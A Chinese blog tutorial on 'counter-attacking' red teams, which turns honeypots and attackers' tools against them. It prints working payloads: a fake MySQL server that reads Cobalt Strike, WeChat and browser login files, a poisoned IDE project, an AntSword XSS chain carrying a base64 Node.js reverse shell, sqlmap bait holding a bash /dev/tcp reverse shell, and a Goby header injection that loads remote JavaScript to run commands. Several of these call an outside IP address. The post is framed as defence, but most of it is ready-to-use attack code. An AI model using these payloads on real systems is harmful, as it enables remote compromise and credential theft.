蓝队技能-溯源反制篇&暴打红队&蜜罐读取&IDE上线&蚁剑RCE&Goby资产&Sqlmap命令

Ethan医生3个月前信息收集193

 蓝队技能-溯源反制-蜜罐&安全工具

#溯源反制-蜜罐-伪装MYSQL

当红队小子对目标进行扫描时,发下存在MYSQL安全问题去利用,便会落入蓝队的陷阱

https://github.com/ev0A/Mysqlist

蓝队:

1、修改读取文件字典

如:

-CS配置文件

C:/Users/Administrator/.aggressor.prop

-微信号配置文件

E:/WeChatFiles/WeChat Files/All Users/config/config.data

-浏览器历史记录

C:/Users/Administrator/AppData/Local/Microsoft/Edge/User Data/Default/Login Data

2、交互式或字典式启动(python2版本运行)

c:\Python27\python.exe exp_dicc.py 3306

c:\Python27\python.exe exp_input.py 3306

 

红队:

采用MYSQL客户端连接后触发

 

 

#溯源反制-蜜罐-伪装源码泄漏

当红队小子对网站进行目录扫描时,发现一个源码包,恰好又会点代审,便会落入蓝队的陷阱前端页面推荐使用登录框,使得红队束手被迫目录扫描,zip包名称推荐source.zip[域名].zip等

https://github.com/wendell1224/ide-honeypot

蓝队:

1、制作蜜罐源代码及配置启动程序workspace.xml

源代码:存放一些正常的源代码程序文件

配置启动:https://github.com/no-one-sec/idea-project-fish-exploit

2、将网站选择性编辑迷惑

· view 目录下放index.html模板文件

· js/css/fonts/img 等目录则是放静态资源

· favicon.ico放在与main.go同级目录(也可以不需要)

· source目录则是jb小子要打开的目录,src下可以放一下没用的源码增加zip包体积诱惑攻击队

3、启动项目等待红队上钩

ide-honeypot.exe -h 0.0.0.0 -p 8080 -f www -c "calc"

 

红队:

开始扫描,找到源码,开始审计,GG

 

 

#溯源反制-Webshell工具-AntSword

蓝队通过修改被植入后门的代码实现获得蚁剑使用者的权限

复现环境:<= v2.0.7 版本蚁剑反制

蓝队:Linux Web

红队:Windows AntSword

原理:

<?php

header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

上线:

Nodejs代码:

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

编码组合后:

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjQ3Ljk0LjIzNi4xMTciLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpO3NoLnN0ZGVyci5waXBlKGNsaWVudCk7fSk7`,`base64`).toString())'>");

 

#溯源反制-SQL注入工具-SQLMAP

蓝队提前构造注入页面诱使红队进行SqlMap注入拿到红队机器权限

复现环境:

蓝队:Linux Web

红队:Linux sqlmap

原理:

命令管道符:ping "`dir`"

构造注入点页面固定注入参数值,等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.236.117/2333 1>&0 2>&0`"

 

1、测试反弹编码:

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值:

<html>

<head>

<meta charset="utf-8">

<title> A sqlmap honeypot demo</title>

</head>

<body>

<input>search the user</input> <!--创建一个空白表单-->

<form action="username.html" method="post" enctype="text/plain">

<!--创建一个隐藏的表单-->

<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

<!--创建一个按钮,提交表单内容-->

<input type="submit" value='提交'>


</form>

</body>

</html>

3、红队攻击者进行注入测试:

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

 

#溯源反制-漏洞扫描工具-Goby

蓝队在红队攻击目标端口上写一个文件,

红队利用goby去扫描分析时会触发反制得到机器权限

复现环境:

蓝队:Linux Web

红队:Windows10 Goby

RCE:

index.php

<?php

header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//47.94.236.117/1.js'))>");

?>

<head>

<title>TEST</title>

</head>

<body>

testtest

</body>

</html>

1.js

(function(){

require('child_process').exec('calc.exe');

})();

2.js上线:

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();


标签: 蓝队技能

相关文章

蓝队技能-应急响应篇&ELK系统&日志采集分析&Yara规则&样本识别&特征提取&规则编写

➢ 蓝队技能-工具项目-ELK日志系统&采集分析&导入分析➢ 蓝队技能-工具项目-Yara威胁感知&规则解析&规则开发#ELK专业系统日志分析Ela...

蓝队技能-设备部署篇&雷池WAF保护Web&蜜罐HFish溯源&堡垒机JumpServer资产管理

➢ 蓝队技能-设备部署-WAF-Web-雷池➢ 蓝队技能-设备部署-蜜罐-服务-HFish➢ 蓝队技能-设备部署-堡垒机-JumpServer#WAF-雷池SafeLin...

蓝队技能-应急响应篇&日志采集&提取查看&自动化分析Web安全&内网攻防&工具项目

➢ 蓝队技能-工具项目-日志收集&提取查看&自动分析#日志自动提取1、七牛Logkit:(Windows&Linux&Mac等)项目地址:https://gi...

蓝队技能-应急响应篇&Rookit后门&进程提取&网络发现&隐藏技术&Linux杀毒&OpenArk

➢ 蓝队技能-Rookit技术-Linux&Win系统&进程隐藏&网络隐藏Windows-Rootkit演示:演示项目:https://bytecode77.com/...

蓝队技能-应急响应篇&近源攻击&Docker镜像&容器分析&Dockfile路径定位&基线扫描

➢ 蓝队技能-Docker镜像-容器分析&处置配置&基线检测#Docker应急Docker拉取的镜像被攻击者拿下,植入后门或挖矿等恶意应用,那么该如何应急?1、启动镜像例子1...

蓝队技能-流量分析篇&WebShell工具类&数据解密&特征研判&哥斯拉&天蝎&冰蝎&蚁剑

➢ 蓝队技能-流量分析-WebShell工具#蓝队技能-流量分析-WebShell工具WebShell工具类:菜刀,蚁剑,冰蝎,天蝎,哥斯拉菜刀:https://mp.weixin.qq.c...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。